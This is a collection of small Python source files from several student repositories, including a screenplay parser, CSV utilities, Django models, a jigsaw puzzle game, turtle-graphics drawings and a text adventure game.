            formato: int equal to 1 if the script structure is valid and 0 otherwise
"""
lista = list()
formato = 0
web = urllib.request.urlopen(url)
html = BeautifulSoup(web.read(), "html.parser")
for pers in html.find_all("b"):
if(not len(pers) == 0):
pn = pers.contents[0]
pn = str(pn)
pn = pn.strip()
if (not '<' in pn and not '>' in pn and not 'EXT.' in pn and not 'INT.' in pn and not 'INT ' in pn and not 'EXT ' in pn and not '.' in pn and not ':' in pn and not ';' in pn and not '"' in pn and not '!' in pn and not '?' in pn and not ',' in pn and len(pn)<30 and not 'Genres' in pn and not 'Writers' in pn and not '_' in pn):
if (not pn in lista):
if(not pn == ''):
lista.append(pn)
self.mod.anadirPersonaje(pn,pn)
if ('EXT. ' in pn or 'INT. ' in pn or 'INT ' in pn or 'EXT ' in pn):
pers = pn.split(' ')
for i in pers:
if('EXT' == i or 'INT' == i or 'EXT.' == i or 'INT.' == i):
formato = 1
return formato
```
#### File: src/LecturaFicheros/Lectorcsv.py
```python
import csv
class Lectorcsv:
"""
    Class for importing and exporting character dictionaries
    Args:
        m: instance of the model class
"""
def __init__(self,m):
self.__modelo = m
def importDict(self, fichero):
"""
        Method that imports a character dictionary that follows a predefined structure
        Args:
            fichero: path to the CSV file to import
"""
i = 0
x= True
with open(fichero, newline='', encoding='utf-8') as csvfile:
spamreader = csv.reader(csvfile, delimiter=',',skipinitialspace=True)
for row in spamreader:
if(x):
x = False
else:
if (i%2 ==0):
i+=1
actual = row[0]
self.__modelo.anadirPersonaje(actual,actual)
else:
i+=1
for n in row:
self.__modelo.anadirReferenciaPersonaje(actual,n)
def exportDict(self, fichero):
"""
        Method that exports the current character dictionary to a CSV file with the same
        structure as the import files
        Args:
            fichero: path where the dictionary should be exported
"""
pers = self.__modelo.getPersonajes()
with open(fichero, mode='w', newline='', encoding='utf-8') as csvfile:
spamwriter = csv.writer(csvfile, delimiter=',')
spamwriter.writerow('Diccionario')
for persk in pers.keys():
spamwriter.writerow([persk])
spamwriter.writerow(pers[persk].getPersonaje().keys())
``` |
{
"source": "2019342a/emoji-bot",
"score": 2
} |
#### File: 2019342a/emoji-bot/main.py
```python
from src.bot import BotClient
from src.constants import KEY
def main():
"""
Runs the bot.
"""
client = BotClient()
client.run(KEY)
if __name__ == "__main__":
main()
``` |
{
"source": "2019342a/reporter",
"score": 3
} |
#### File: reporter/tests/test_utils.py
```python
from unittest.mock import patch
from .context import create_reporter
from .context import format_args
from .context import format_kwargs
@patch("logging.Logger.addHandler")
def test_create_reporter(mock_process):
create_reporter()
assert mock_process.called
def test_format_args():
integers = [1, 2, 3]
strings = ["a", "b", "c"]
assert format_args(integers) == "args 1 2 3"
assert format_args(strings) == "args a b c"
def test_format_kwargs():
kwargs = {1: 2, 2: 3}
assert format_kwargs({}) == ""
assert format_kwargs(kwargs) == ", kwargs 1=2 2=3"
``` |
{
"source": "2019342a/solid-palm-tree",
"score": 4
} |
#### File: solid-palm-tree/src/parse.py
```python
import csv
SF_FILE = "data/sample_sfpd_incident_all.csv"
def parse(raw_file, delimiter):
"""Parses a raw CSV file to a JSON-line object."""
parsed_data = []
opened_file = open(raw_file)
csv_data = csv.reader(opened_file, delimiter=delimiter)
    fields = next(csv_data)
for row in csv_data:
parsed_data.append(dict(zip(fields, row)))
opened_file.close()
return parsed_data
``` |
{
"source": "2019342a/ubiquitous-octo-pancake",
"score": 2
} |
#### File: {{cookiecutter.app_name}}/tests/test_models.py
```python
def test_basic():
assert 4 == 4
``` |
{
"source": "2019-a-gr1-python/py-guevara-sanandres-juan-diego",
"score": 3
} |
#### File: py-guevara-sanandres-juan-diego/Deber_2_Rompecabezas/Jigsaw.py
```python
import math
import random
import numpy as np
import matplotlib.pyplot as plt
##import matplotlib.image as mpimg
class Puzzle:
def __init__(self):
self.imagen = plt.imread('Z:/junt_/Pictures/Backgrounds/thanos.jpg')
self.rows_croped_image_list = None
self.rows_croped_image_array = None
self.columns_croped_image_list = []
##self.columns_croped_image_array = []
self.rows = 0
self.columns = 0
self.img = None
def createJigsaw(self,dimensions):
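        # Split the image into the requested number of horizontal strips, shuffle them,
        # then split each strip into pieces and shuffle those too before stitching the
        # shuffled pieces back into a single image.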
self.img = np.array(self.imagen)
self.rows_croped_image_list = np.vsplit(self.img,int(dimensions[0]))
random.shuffle(self.rows_croped_image_list)
for i in range(0,int(dimensions[0])):
self.columns_croped_image_list.append(np.hsplit(self.rows_croped_image_list[i],int(dimensions[1])))
random.shuffle(self.columns_croped_image_list[i])
self.rows_croped_image_list[i] = np.hstack(self.columns_croped_image_list[i])
self.rows_croped_image_array = np.vstack(self.rows_croped_image_list)
plt.imshow(self.rows_croped_image_array)
plt.show(block=False)
def changePiece(self,pos_piece_A,pos_piece_B):
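        # Convert the 1-based piece numbers into (row, column) indices, swap the two
        # pieces in the column lists, and rebuild the displayed image.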
pos_x_piece_A = math.ceil(pos_piece_A/self.columns) - 1
pos_y_piece_A = pos_piece_A - (pos_x_piece_A*self.columns) -1
pos_x_piece_B = math.ceil(pos_piece_B/self.columns) - 1
pos_y_piece_B = pos_piece_B - (pos_x_piece_B*self.columns) -1
list_aux_1 = self.columns_croped_image_list[pos_x_piece_A]
piece_1 = list_aux_1[pos_y_piece_A]
list_aux_2 = self.columns_croped_image_list[pos_x_piece_B]
piece_2 = list_aux_2[pos_y_piece_B]
list_aux_1[pos_y_piece_A] = piece_2
list_aux_2[pos_y_piece_B] = piece_1
self.rows_croped_image_list[pos_x_piece_A] = np.hstack(list_aux_1)
self.rows_croped_image_list[pos_x_piece_B] = np.hstack(list_aux_2)
self.rows_croped_image_array = np.vstack(self.rows_croped_image_list)
plt.imshow(self.rows_croped_image_array)
plt.show(block=False)
def main(self):
keyboard_entry = None
plt.imshow(self.imagen)
plt.show(block=False)
entry = input("Ingrese en cuantas filas y columnas desea que esté dividido su rompecabezas. Ejemplo: 9,4\n")
dimensions = entry.split(",")
self.rows = int(dimensions[0])
self.columns = int(dimensions[1])
num_pieces = self.rows*self.columns
self.createJigsaw(dimensions)
print(f"Se han generado {num_pieces} piezas númeradas desde la esquina superior derecha")
while keyboard_entry != 'q':
if(np.array_equal(self.img,self.rows_croped_image_array)):
print("Felicidades ganaste")
break
else:
keyboard_entry = input("Ingrese las 2 piezas que quiere cambiar separadas por coma. Ejemplo: 12,1\nPresione q si desea salir\n")
if(keyboard_entry != 'q'):
pieces = keyboard_entry.split(",")
piece_A = int(pieces[0])
piece_B = int(pieces[1])
if(1<=piece_A<=num_pieces and 1<=piece_B<=num_pieces):
self.changePiece(piece_A,piece_B)
else:
print("Escribe bien")
Puzzle().main()
``` |
{
"source": "2019CapstoneDesign/CD4_FastQuest",
"score": 2
} |
#### File: TT/api/models.py
```python
from django.utils.timezone import now
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
import datetime
class LargeCat(models.Model):
lcat_name = models.CharField(db_column='Lcat_name', primary_key=True, max_length=50) # Field name made lowercase.
class Meta:
db_table = 'large_cat'
def __str__(self):
return self.lcat_name
class Category(models.Model):
cat_name = models.CharField(primary_key=True, max_length=50)
lcat_name = models.ForeignKey(LargeCat, models.DO_NOTHING, db_column='Lcat_name', blank=True, null=True) # Field name made lowercase.
activity_rate = models.IntegerField(blank=True, null=True)
sociality_rate = models.IntegerField(blank=True, null=True)
class Meta:
db_table = 'category'
def __str__(self):
return self.cat_name
class Activity(models.Model):
act_id = models.AutoField(primary_key=True)
title = models.CharField(max_length=100)
category = models.ForeignKey(Category, models.DO_NOTHING, db_column='category')
content = models.TextField(blank=True, null=True)
longterm = models.CharField(max_length=1, blank=True, null=True)
outside = models.CharField(max_length=1, blank=True, null=True)
address = models.CharField(max_length=100, blank=True, null=True)
latitude = models.FloatField(blank=True, null=True)
longitude = models.FloatField(blank=True, null=True)
class Meta:
db_table = 'activity'
def __str__(self):
return '%s. %s' % (self.act_id, self.title)
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
nickname = models.CharField(max_length=30, blank=True, null=True)
score = models.IntegerField(default=0, blank=True, null=True)
activity = models.IntegerField(blank=True, null=True)
sociality = models.IntegerField(default=100, blank=True, null=True)
gender = models.CharField(default='M', max_length=10, blank=True, null=True)
age = models.IntegerField(blank=True, null=True)
created = models.DateTimeField(default=now, blank=True, null=True)
class Meta:
db_table = 'profile'
def __str__(self):
return '%s %s' % (self.user.username, self.user.email)
# return self.user.username
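# The signal receivers below create a Profile automatically whenever a new User is saved,
# and keep the related Profile saved on subsequent User updates.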
@receiver(post_save, sender=User)
def create_user_profile(sender, instance, created, **kwargs):
if created:
Profile.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_user_profile(sender, instance, **kwargs):
instance.profile.save()
class Assemble(models.Model):
title = models.CharField(max_length=50, blank=True, null=True)
category = models.ForeignKey(Category, models.DO_NOTHING, blank=True, null=True)
content = models.TextField(blank=True, null=True)
time = models.DateTimeField(default=now, blank=True, null=True)
photo = models.ImageField(default='default_image.jpeg')
author = models.ForeignKey(Profile, models.DO_NOTHING, blank=True, null=True)
class Meta:
db_table = 'assemble'
def __str__(self):
return self.title
class Feed(models.Model):
act = models.ForeignKey(Activity, models.DO_NOTHING)
title = models.CharField(max_length=50, blank=True, null=True)
content = models.TextField(blank=True, null=True)
time = models.DateTimeField(default=now, blank=True, null=True)
author = models.ForeignKey(Profile, models.DO_NOTHING, blank=True, null=True)
image = models.ImageField(default='default_image.jpeg')
class Meta:
db_table = 'feed'
def __str__(self):
return '%s. %s' % (self.act, self.title)
class PreCat(models.Model):
#id = models.AutoField(primary_key=True)
user = models.ForeignKey(Profile, models.DO_NOTHING, db_column='user_id')
cat_name = models.ForeignKey(Category, models.DO_NOTHING, db_column='cat_name')
class Meta:
db_table = 'pre_cat'
unique_together = (('user', 'cat_name'),)
def __str__(self):
return '%s: %s' % (self.user, self.cat_name)
class Takes(models.Model):
user = models.ForeignKey(Profile, models.DO_NOTHING, db_column='userid')
act = models.ForeignKey(Activity, models.DO_NOTHING)
star = models.IntegerField(default=3, blank=True, null=True)
date = models.DateField(default=datetime.date.today)
class Meta:
db_table = 'takes'
unique_together = (('id', 'act', 'date'),)
def __str__(self):
return '%s. %s' % (self.user.user.username, self.act)
class Challenge(models.Model):
cat_name = models.CharField(max_length=50)
act_name = models.CharField(max_length=50)
content = models.TextField(blank=True, null=True)
image = models.ImageField(default='default_image.jpeg')
def __str__(self):
return '%s. %s' % (self.cat_name, self.act_name)
class LikeFeed(models.Model):
user = models.ForeignKey(Profile, models.DO_NOTHING)
feed = models.ForeignKey(Feed, models.DO_NOTHING)
class Meta:
db_table = 'likefeed'
unique_together = (('id', 'feed'),)
def __str__(self):
return '%s. %s' % (self.user.user.username, self.feed)
class LikeAssemble(models.Model):
user = models.ForeignKey(Profile, models.DO_NOTHING)
assemble = models.ForeignKey(Assemble, models.DO_NOTHING)
class Meta:
db_table = 'likeassemble'
unique_together = (('id', 'assemble'),)
def __str__(self):
return '%s. %s' % (self.user.user.username, self.assemble)
``` |
{
"source": "2019-fall-csc-226/a02-loopy-turtles-loopy-languages-manalais-a02",
"score": 4
} |
#### File: 2019-fall-csc-226/a02-loopy-turtles-loopy-languages-manalais-a02/a02_manalais.py
```python
import turtle
def icecream_cone(cone):
cone.penup()
cone.pensize(3)
cone.setpos(25, 25)
cone.color('tan')
cone.pendown()
cone.fillcolor('tan')
cone.begin_fill()
cone.right(70)
cone.forward(102)
cone.left(70)
cone.forward(40)
cone.right(-75)
cone.forward(100)
cone.left(105)
cone.forward(100)
cone.end_fill()
def icecream_circle(circle):
circle.penup()
circle.setpos(75, 100)
circle.pensize(3)
circle.color('pink')
circle.pendown()
circle.fillcolor('pink')
circle.begin_fill()
circle.circle(-52)
circle.end_fill()
def random0(random):
random.penup()
random.setpos(-45,40)
random.pensize(6)
random.color('blue')
random.pendown()
random.fillcolor('blue')
random.begin_fill()
for side in range(2):
random.forward(60)
random.right(90)
random.forward(60)
random.right(90)
random.end_fill()
def main():
wn = turtle.Screen()
cone = turtle.Turtle()
circle = turtle.Turtle()
random = turtle.Turtle()
icecream_cone(cone)
icecream_circle(circle)
random0(random)
wn.exitonclick()
main()
``` |
{
"source": "2019-fall-csc-226/a02-loopy-turtles-loopy-languages-sontayvicentej-a02",
"score": 4
} |
#### File: 2019-fall-csc-226/a02-loopy-turtles-loopy-languages-sontayvicentej-a02/a02_sontayvicentej.py
```python
import turtle
wn = turtle.Screen()
jhonny = turtle.Turtle()
another = turtle.Turtle()
jhonny.color()
def square(t, distance):
""" Draws a square"""
for k in ["red", "yellow", "orange", "blue"]:
t.color(k)
t.forward(distance)
t.left(90)
for i in range(3):
jhonny.forward(80)
jhonny.left(36)
for i in range(3):
jhonny.forward(80)
jhonny.left(36)
size = 15
for i in range(10):
square(jhonny, 76)
size = size+15
jhonny.forward(80)
jhonny.left(36)
wn.exitonclick()
``` |
{
"source": "2019-fall-csc-226/a03-master",
"score": 3
} |
#### File: 2019-fall-csc-226/a03-master/a03_barnwellj.py
```python
import turtle
sc = turtle.Screen()
sc.bgcolor("#ADD8E6")
ht = turtle.Turtle()
ht.pensize(15)
ht.penup()
ht.setpos(-200, 0)
ht.pendown()
ht.speed(10)
def draw_square(ht):
ht.fillcolor("#FFFF33")
ht.begin_fill()
for a in range(4): #draws the main part of the house
ht.fd(300)
ht.right(90)
ht.end_fill()
pass
def drawtriangle(ht):
ht.fillcolor("#ff0000")
ht.begin_fill()
for t in range(3): #draws the roof of the house
ht.fd(150)
ht.left(120)
ht.fd(150)
ht.end_fill()
def drawwindow(ht):
ht.fillcolor("#0000FF")
ht.begin_fill()
for w in range(4):
ht.fd(100)
ht.right(90)
ht.end_fill()
pass
def drawdoor(ht):
ht.fillcolor("#D2691E")
ht.begin_fill()
ht.fd(50)
ht.right(90)
ht.forward(90)
ht.right(90)
ht.fd(100)
ht.right(90)
ht.fd(90)
ht.right(90)
ht.fd(80)
ht.end_fill()
ht.right(90)
ht.penup()
ht.fd(55)
def drawgrass(ht): #Function to create grass underneath the house
ht.setpos(-690, -315)
ht.right(90)
ht.pendown()
ht.pencolor("#228B22")
ht.fillcolor("#228B22") #Changes the fill color to green
ht.begin_fill()
ht.fd(1500)
ht.right(90)
ht.fd(30)
ht.right(90)
ht.fd(1500)
ht.right(90)
ht.fd(30)
ht.end_fill()
def stick(ht):
ht.color("#000000") #setting color and pensize for the stick figure
ht.pensize(5)
ht.left(120) #draws the stick figure
ht.fd(50)
ht.right(120)
ht.fd(55)
ht.right(180)
ht.fd(55)
ht.right(30)
ht.pendown()
ht.fd(50)
ht.right(45)
ht.fd(50)
ht.right(180)
ht.fd(100)
ht.left(180)
ht.fd(50)
ht.left(15)
ht.fd(5)
ht.circle(30)
def message(ht):
ht.setpos(70, -20) #tells turtle to write a message on the screen
ht.color("#000000")
style = ('Courier', 20, 'italic')
ht.write("Hello, and Welcome to my Home!!!", font=style, )
def main():
drawtriangle(ht) #starts drawing the house, beginning with the roof
ht.fd(150)
ht.right(90)
draw_square(ht)
ht.fd(120) #draws the main part of the house, and sets position of turtle
ht.right(90)
ht.penup()
ht.fd(40)
ht.pendown() #positions the turtle and draws the window
drawwindow(ht)
ht.penup()
ht.fd(120)
ht.pendown()
drawwindow(ht) #draws the second window
ht.penup()
ht.setpos(-200, -300) #postitions the turtle and draws a door
ht.pendown()
drawdoor(ht)
drawgrass(ht)
ht.penup()
ht.right(90)
ht.fd(1000)
ht.left(90)
ht.fd(10)
ht.right(145)
ht.pendown()
stick(ht)
ht.penup()
ht.fd(50)
message(ht)
#draws grass below the house
main()
sc.exitonclick()
```
#### File: 2019-fall-csc-226/a03-master/a03_schweinsbergs.py
```python
import turtle
def CreateHead(turtle):
"""
Creates the head for the puppy we're making!
:return: none
"""
turtle.penup()
turtle.speed(0)
turtle.setpos(100,-50)
turtle.pendown()
turtle.color("#bd9f60")
turtle.shape('arrow')
turtle.begin_fill()
for head in range(4):
turtle.left(90)
turtle.forward(200)
turtle.end_fill()
def CreateEars(turtle):
"""
Creates the ears for the puppy we're making!
:return: none
"""
turtle.penup()
turtle.speed(0)
turtle.setpos(100,150)
turtle.pendown()
turtle.color("#615232")
turtle.shape('arrow')
turtle.begin_fill()
for ears in range(2):
turtle.forward(100)
turtle.right(90)
turtle.forward(300)
turtle.right(90)
turtle.end_fill()
turtle.penup()
turtle.setpos(-200,150)
turtle.pendown()
turtle.begin_fill()
for earstwo in range(2):
turtle.forward(100)
turtle.right(90)
turtle.forward(300)
turtle.right(90)
turtle.end_fill()
def DrawEyes(turtle):
"""
Gives eyes to the puppy we're drawing!
:return: none
"""
turtle.penup()
turtle.speed(0)
turtle.color('light blue')
turtle.shape('arrow')
turtle.setpos(-70,100)
turtle.pendown()
turtle.begin_fill()
for eyesone in range(4):
turtle.forward(30)
turtle.right(90)
turtle.end_fill()
turtle.penup()
turtle.setpos(40,100)
turtle.pendown()
turtle.begin_fill()
for eyestwo in range(4):
turtle.forward(30)
turtle.right(90)
turtle.end_fill()
turtle.penup()
def DrawNose(turtle):
turtle.penup()
turtle.setpos(-15,40)
turtle.shape('arrow')
turtle.color('light pink')
turtle.pendown()
turtle.begin_fill()
for nose in range(3):
turtle.forward(30)
turtle.left(-120)
turtle.end_fill()
def DrawMouth(turtle):
"""
Makes a mouth and tongue for our puppy!
"""
turtle.penup()
turtle.color('black')
turtle.setpos(-50,20)
turtle.pendown()
turtle.right(90)
turtle.forward(30)
turtle.left(90)
turtle.forward(100)
turtle.left(90)
turtle.forward(30)
turtle.penup()
turtle.color('red')
turtle.setpos(-20,-11)
turtle.pendown()
turtle.begin_fill()
for tongue in range(2):
turtle.right(90)
turtle.forward(40)
turtle.right(90)
turtle.forward(90)
turtle.penup()
turtle.setpos(700,700)
turtle.end_fill()
def main(turtle):
"""
Calls all of the functions in order so that the puppy can be drawn!
:return: none
"""
wn = turtle.Screen()
wn.bgcolor('light green')
CreateHead(turtle)
CreateEars(turtle)
DrawEyes(turtle)
DrawNose(turtle)
DrawMouth(turtle)
wn.exitonclick()
main(turtle)
``` |
{
"source": "2019-fall-csc-226/t03-boustrophedon-turtles-eubanksn-belainehi-t03",
"score": 4
} |
#### File: 2019-fall-csc-226/t03-boustrophedon-turtles-eubanksn-belainehi-t03/project.py
```python
import turtle
def boustrophedon(g):
"'This function fills up the square in a bustrophedon pattern.'"
#draws the inner filings
g.penup()
g.setpos(-170, 170)
g.pendown()
for w in range(45):
g.color("yellow")
g.speed(10)
g.right(90)
# side.forward(5)
g.left(90)
g.forward(440)
g.right(90)
g.forward(5)
g.right(90)
g.forward(440)
g.left(90)
g.forward(5)
g.left(90)
def square (side):
"'This function draws the square. '"
# draw square
for i in range(2):
side.forward(500)
side.right(90)
side.forward(500)
side.right(90)
def main():
"'This is where the two functions come together. "''
#Create a window
wn = turtle.Screen()
wn.bgcolor("white")
#Create a turtle
side = turtle.Turtle()
side.penup()
side.setpos(-200,200)
side.pendown()
side.pensize(30)
#draw the insides
square (side)
boustrophedon (side)
wn.exitonclick()
main()
``` |
{
"source": "2019-fall-csc-226/t03-boustrophedon-turtles-maynardb_conceptanjolima_t3",
"score": 4
} |
#### File: 2019-fall-csc-226/t03-boustrophedon-turtles-maynardb_conceptanjolima_t3/t03_stub.py
```python
import turtle
def outside_square(t, l):
"""
creates a border square
param t: a turtle object
param l:the length of the square
return: none
"""
for i in range(4):
t.forward(l)
t.left(90)
# ...
def draw_pattern(t, l, h):
"""
draw the pattern inside the border square
param t: turtle input
param l: length of the inside design
param h: height of the design
return: none
"""
for i in range(11):
t.forward(l)
t.left(90)
t.forward(h)
t.left(90)
t.forward(l)
t.right(90)
t.forward(h)
t.right(90)
# ...
def main():
"""
sets up attributes and calls functions
return: none
"""
# ...
wn = turtle.Screen()
scott = turtle.Turtle()
scott.pensize(20)
scott.penup()
scott.setpos(250, 250)
scott.left(180)
scott.pendown()
outside_square(scott, 500) # Function call to function_1
scott.penup()
scott.setposition(230, 230)
scott.pendown()
scott.color("red")
draw_pattern(scott, 460, 20) # Function call to function_2
scott.forward(460)
scott.left(90)
scott.forward(20)
scott.left(90)
scott.forward(460)
wn.exitonclick()
main()
``` |
{
"source": "2019-fall-csc-226/t03-boustrophedon-turtles-meadors-frank-t03",
"score": 3
} |
#### File: 2019-fall-csc-226/t03-boustrophedon-turtles-meadors-frank-t03/t03_stub.py
```python
import turtle
#################################################################################
# define functions to create a square using
#################################################################################
def square_turtle(name, x, y, size):
"""
Creates a square of defined size.
"""
name.penup()
name.goto(x, y)
name.pendown()
name.setheading(0)
for side in range(4):
name.forward(size)
name.left(90)
def squiggle_right(meadors):
"""
Uses turtle to fill a line left to right
"""
for cross_space in range(12):
for first_arc in range(2):
meadors.forward(20)
meadors.right(90)
for second_arc in range(2):
meadors.forward(20)
meadors.left(90)
def squiggle_left(t):
"""
Uses Turtle to fill a line from right to left
"""
for cross_space in range(12):
for first_arc in range(2):
t.left(90)
t.forward(20)
for second_arc in range(2):
t.right(90)
t.forward(20)
# ...
def main():
"""
Function Starts all the other functions
Makes and fills a square
"""
wn = turtle.Screen()
wn.bgcolor('black')
meadors = turtle.Turtle()
meadors.color('deep sky blue')
meadors.pensize(20)
meadors.speed(0)
# Call function to make square and size it
square_turtle(meadors, -260, -260, 520)
# move turtle to fill start point
meadors.penup()
meadors.pencolor('green')
meadors.goto(-240, -240)
meadors.pendown()
meadors.setheading(90)
# call both squiggle functions to fill in area
for fill in range(6):
squiggle_right(meadors)
meadors.forward(60)
squiggle_left(meadors)
meadors.forward(20)
# ...
# fill in last remaining line
meadors.right(90)
meadors.forward(480)
wn.exitonclick()
############################################################################
# set up the screen and turtle, then let the main function do its things
############################################################################
main()
``` |
{
"source": "2019-fall-csc-226/t04-master",
"score": 4
} |
#### File: 2019-fall-csc-226/t04-master/t04_refactored.py
```python
import random
from time import sleep
delay = 1.0 # change to 0.0 for testing/speed runs; larger for dramatic effect!
dead = False
def start_story():
"""
Introduction text for the story. Don't modify this function.
:return: the user's name, captured from user input
"""
user = input("What do they call you, unworthy adversary? ")
print()
print("Welcome,", user, ", to the labyrinth")
sleep(delay)
print("Before you lies two paths. One path leads to treasures of unimaginable worth.")
print("The other, certain death. Choose wisely.")
print()
sleep(delay * 2)
print("You are in a dark cave. You can see nothing.")
print("Staying here is certainly not wise. You must find your way out.")
print()
sleep(delay)
return user
def end_story(user):
"""
This is the ending to the story. Don't modify this function, either.
:param user: the user's name
:return: None
"""
print(
"Congratulations, " + user + ", you have made it to the end of this... strange... adventure. I hope you feel accomplished.")
print()
print()
print()
sleep(delay * 5)
print("Now go play again.")
def kill_if_dead(dead):
"""
Simple function to check if you're dead
:param dead: A boolean value where false let's the story continue, and true ends it.
:return: None
"""
if dead:
quit()
###################################################################################
def scott_adventure():
"""
My original adventure text I gave as an example. Leave it alone as well.
:return: None
"""
global dead # You'll need this to be able to modify the dead variable
direction = input("Which direction would you like to go? [North/South/East/West]")
if direction == "North":
# Good choice!
print("You are still trapped in the dark, but someone else is there with you now! I hope they're friendly...")
sleep(delay)
elif direction == "South":
# Oh... Bad choice
print("You hear a growl. Not a stomach growl. More like a big nasty animal growl.")
sleep(delay)
print("Oops. Turns out the cave was home to a nasty grizzly bear. ")
print("Running seems like a good idea now. But... it's really, really dark.")
print("You turn and run like hell. The bear wakes up to the sound of your head bouncing off a low stalactite. ")
print()
sleep(delay * 2)
print("He eats you. You are delicious.")
dead = True
else:
# Neutral choice
print(
"You're in another part of the cave. It is equally dark, and equally uninteresting. Please get me out of here!")
sleep(delay)
kill_if_dead(dead)
###################################################################################
def team_1_adv():
    """This function runs one room where you have to choose which wire to cut in a bomb. Choose wisely!"""
    global dead
sleep(delay * 2)
print("\n\nYou continue on with your journey. You happen to stumble across a bomb.")
print("God offers you some wirecutters. With nothing to lose, you decide to be a hero.")
print("You unscrew the bomb. In front of you are three wires: red, blue, and yellow.")
sleep(delay * 2)
print("Which wire will you choose, dude?")
color = input("Red, Blue, or Yellow?")
if color == "red":
# The good choice
print("You suck in a breath and then cut the wire. The LEDs flicker, then shut off. You did it!")
elif color == "blue":
# The bad choice
print("You suck in a breath and then cut the wire. ")
print("The bomb explodes into a white light. You die instantly.")
dead = True
else:
print("You suck in a breath and cut the yellow wire.")
print("")
print("Nothing explicitly happens, but suddenly you have a loaf of banana nut bread in your pocket.")
print("... You decide to move on.")
kill_if_dead(dead)
"""This function runs one room where you have to choose which wire to cut in a bomb. Choose wisely!"""
def team_2_adv():
######################################################################
# Author: <NAME> & <NAME>
# Username: zapatamezaj & maynardb
#
# Assignment: T04: Adventure in Gitland
#
# Purpose: To recreate a choose-your-own-adventure style game
# by refactoring T01.
######################################################################
"""
Google Document Link:
https://docs.google.com/document/d/1N2BXxH4VsnbuLDMHqq_gNpbawFb-_D3vbwr5oPuuR8g/edit?usp=sharing"""
global dead
print("Congratulations! \n"
"You have survived so far. But the journey does not end for the gold still lays undiscovered. \n ")
sleep(delay * 2)
direction = input("Which way would you like to go now? Choose wisely North, East, West or South?\n")
if direction == "East":
# Good choice
print("You have proven how worthy you are so the gods have decided to reward you with Gold. \n "
"You are rich now go home and spread your wealth! \n")
elif direction == "North":
# Bad choice
print("This trip is only for the worthy. You have been found unworthy and the gods have sacked your soul.\n")
dead = True
elif direction == "West":
# Bad choice
print("Some wolves come by and urinate all over your stuff, then eat your face off. \n"
"Tragic, you could have been rich but now you're dead.")
dead = True
else:
print("You were found by a group of robbers. They know you have enough food and gold to last you days. \n"
"They loot you and leave you for the bears.")
dead = True
sleep(delay)
kill_if_dead(dead)
print("You're in the cave, its night time and you began to hear screams from one of two paths.")
direction = input("Which path will you take, East or West? Choose wisely.")
if direction == "East":
print("""Congratulations! You have found the exit and have made it out with only a few scratches
and maybe some broken bones, but look on the bright side, at least you're alive.""")
else:
print("You become curious of the screams and follow them. \n"
"You stumble upon a group of rich cave people that party and they invite you to join them")
kill_if_dead(dead)
def team_3_adv():
"""
Authors: <NAME>
Google Link: https://docs.google.com/document/d/1OFzXphHUyPa6YQpFq5rVqsW-1NFc8JwoCqsTKO79Lbw/edit?usp=sharing
:return: N/A
"""
username = input("What do you call yourself?")
action = input_action()
ask_action(username, action)
sleep(delay)
def input_action():
"""
Starts the story, asks user to select an option.
:return: Returns the result of the variable 'action'.
"""
print("You are being chased by a group of goblins.")
print("You and your friend for some reason decide to run to a cliff. What do you do?")
action = input("[Sleep | Jump | Do Nothing | Fight] ")
return action
def ask_action(username, my_input):
"""
This function will generate a set list of prompts based upon the my_input variable.
:param username: Utilizes the users name in the print functions.
:param my_input: Allows the user to input a finite selection of options to further the program.
:return: N/A
"""
if my_input == "sleep" or my_input == "Sleep":
# Good choice
sleep(delay)
print("Amazing! Good job, ", username, "! You have found their weakness! Goblins can't see sleeping people...")
sleep(delay)
print("As you awake, you notice some golden coins one of the goblins left behind.")
sleep(delay)
elif my_input == "do nothing" or my_input == "Do nothing":
# Bad choice
print("Do nothing? YOU DIE!!!!")
sleep(delay)
print("Oh no! You died. Better luck next time! Try again by hitting the green play button. ")
kill_if_dead(True)
elif my_input == "fight" or my_input == "Fight":
print("You have proved so brave", username, ". Go on with your journey!")
elif my_input == "jump" or my_input == "Jump":
print("At the bottom of this cliff lies waves of fast flowing water. Jumping was not a good choice!")
else:
print("The choice you entered is not available. Please enter a valid choice.")
# Finished, yay!
def team_4_adv():
pass
# TODO Add your code here
def test_the_rainbow(flavor):
"""
Editors: <NAME>
<NAME>
Function takes the input given by the user and checks to see if it is similar to one of the three options given.
If it isn't, it returns "True" so the question can be repeated.
:return: True
"""
if len(flavor) == 9 and flavor[0] == "s" and flavor[8] == 'y':
# Good choice!
print("Good choice!This makes you feel a lot better")
print("considering your friend disappeared mysteriously the other day.\n")
sleep(delay)
elif len(flavor) == 10 and flavor[0] == "p" and flavor[9] == 'o':
# Neutral choice
print("You feel a tingling sensation in your throat, and you start puking blood and pistachios.")
print("As everything starts going black, you vaguely hear evil laughter. ")
print("The ice cream van starts up and a merry song starts playing and slowly fades away \n")
elif len(flavor) == 9 and flavor[0] == "c" and flavor[8] == 'e':
# Oh... Bad choice
print("Here you go, this is a van favorite!")
sleep(delay)
print("Oh it tastes so familiar but not in a good way")
print("At first you don't realize it but then you start feeling nauseous")
print("You start vomiting and ask 'What the hell was that?'")
print("The ice cream people tells you: Don't worry! It's just your friend! \n")
# Kill the player and end the program if this choice is made
kill_if_dead(True)
else:
return True
def team_5_adv():
"""
######################################################################
# Assignment: T04: Adventure in Gitland
# Editors: <NAME>
# <NAME>
# Google Doc: https://docs.google.com/document/d/1icOBu4PV5DDGkWtmThEnmaj2JaOW1aoW9Yujh0_caLo/edit?usp=sharing
######################################################################
:return:
"""
typo = True
while typo == True:
flavor = input("Which flavor would you like? [Strawberry/Pistachio/Chocolate]")
print()
flavor = flavor.lower()
typo = test_the_rainbow(flavor)
if typo == True:
print("Looks like the answer you provided isn't close to your choices")
sleep(delay)
print("Please try again unless you want to be stuck here forever... \n")
def team_6_adv():
pass
# TODO Add your code here
def team_7_adv():
"""
https://docs.google.com/document/d/1Dh_Zd3X9bS8DijgocvDM0IqgX9UTT2eTzIUM_Pj_I-U/edit?ts=5d7ba1f3#heading=h.f6tumop9n7at
:return: None
"""
global dead
direction = input("Which direction would you like to go? [Right/Forward/Backward/Left]")
direction = direction.lower() #changes the user's input to lowercase
if direction == "right":
# Good Choice!
print("You rush into the nearby trees for cover. There you find a mystical coconut that will slay the dragon.")
sleep(delay)
elif direction == "forward":
# Bad Choice
integer = int(
input(
"You have made a bad choice! You have one more chance to avoid being burnt alive. Pick a number."))
if integer <= 50:
print("You have saved yourself and spared yourself from the dragon!")
elif integer > 50:
print("You failed to make a better decision and gave the dragon time to get the BBQ sauce.")
